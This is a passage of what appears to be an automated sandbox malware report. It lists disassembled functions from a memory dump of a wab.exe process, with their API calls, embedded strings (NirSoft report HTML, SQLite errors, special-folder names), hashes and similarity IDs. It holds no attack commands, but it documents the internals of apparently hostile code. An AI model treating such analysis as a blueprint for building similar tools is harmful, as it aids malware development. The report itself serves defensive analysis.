                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                  • String ID: A
                                                  • API String ID: 2892645895-3554254475
                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                  Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                  • memset.MSVCRT ref: 0040DA23
                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                  • String ID: caption
                                                  • API String ID: 973020956-4135340389
                                                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                  Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf$wcscpy
                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                  • API String ID: 1283228442-2366825230
                                                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                  Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcschr.MSVCRT ref: 00413972
                                                  • wcscpy.MSVCRT ref: 00413982
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                  • wcscpy.MSVCRT ref: 004139D1
                                                  • wcscat.MSVCRT ref: 004139DC
                                                  • memset.MSVCRT ref: 004139B8
                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                  • memset.MSVCRT ref: 00413A00
                                                  • memcpy.MSVCRT ref: 00413A1B
                                                  • wcscat.MSVCRT ref: 00413A27
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                  • String ID: \systemroot
                                                  • API String ID: 4173585201-1821301763
                                                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                  Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy
                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                  • API String ID: 1284135714-318151290
                                                  • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                  • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                  Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                  • String ID: 0$6
                                                  • API String ID: 4066108131-3849865405
                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                  Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004082EF
                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                  • memset.MSVCRT ref: 00408362
                                                  • memset.MSVCRT ref: 00408377
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharMultiWide
                                                  • String ID:
                                                  • API String ID: 290601579-0
                                                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                  Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memchrmemset
                                                  • String ID: PD$PD
                                                  • API String ID: 1581201632-2312785699
                                                  • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                  • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                  • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                  • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                  Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                  • GetDC.USER32(00000000), ref: 00409F6E
                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                  • GetParent.USER32(?), ref: 00409FA5
                                                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                  • String ID:
                                                  • API String ID: 2163313125-0
                                                  • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                  • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                  • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                  • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                  Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$wcslen
                                                  • String ID:
                                                  • API String ID: 239872665-3916222277
                                                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                  Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                  • String ID: %s (%s)$YV@
                                                  • API String ID: 3979103747-598926743
                                                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                  Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                  • String ID: Unknown Error$netmsg.dll
                                                  • API String ID: 2767993716-572158859
                                                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                  Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • wcscpy.MSVCRT ref: 0040DAFB
                                                  • wcscpy.MSVCRT ref: 0040DB0B
                                                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                  • API String ID: 3176057301-2039793938
                                                  • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                  • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                  • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                  • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                  Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • unable to open database: %s, xrefs: 0042F84E
                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                  • database is already attached, xrefs: 0042F721
                                                  • out of memory, xrefs: 0042F865
                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                  • database %s is already in use, xrefs: 0042F6C5
                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                  • API String ID: 1297977491-2001300268
                                                  • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                  • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                  Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                  • memcpy.MSVCRT ref: 0040EB80
                                                  • memcpy.MSVCRT ref: 0040EB94
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                  • String ID: ($d
                                                  • API String ID: 1140211610-1915259565
                                                  • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                  • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                  • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                  • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                  Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                  • String ID:
                                                  • API String ID: 3015003838-0
                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                  Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00407E44
                                                  • memset.MSVCRT ref: 00407E5B
                                                  • _mbscpy.MSVCRT ref: 00407E7E
                                                  • _mbscpy.MSVCRT ref: 00407ED7
                                                  • _mbscpy.MSVCRT ref: 00407EEE
                                                  • _mbscpy.MSVCRT ref: 00407F01
                                                  • wcscpy.MSVCRT ref: 00407F10
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                  • String ID:
                                                  • API String ID: 59245283-0
                                                  • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                  • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                  • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                  • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                  Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                  • String ID:
                                                  • API String ID: 3467550082-0
                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                  Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                  • API String ID: 3510742995-3273207271
                                                  • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                  • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                  • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                  • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                  Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                  • memset.MSVCRT ref: 00413ADC
                                                  • memset.MSVCRT ref: 00413AEC
                                                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                  • memset.MSVCRT ref: 00413BD7
                                                  • wcscpy.MSVCRT ref: 00413BF8
                                                  • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                  • String ID: 3A
                                                  • API String ID: 3300951397-293699754
                                                  • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                  • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                  • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                  • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                  Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • wcscpy.MSVCRT ref: 0040D1B5
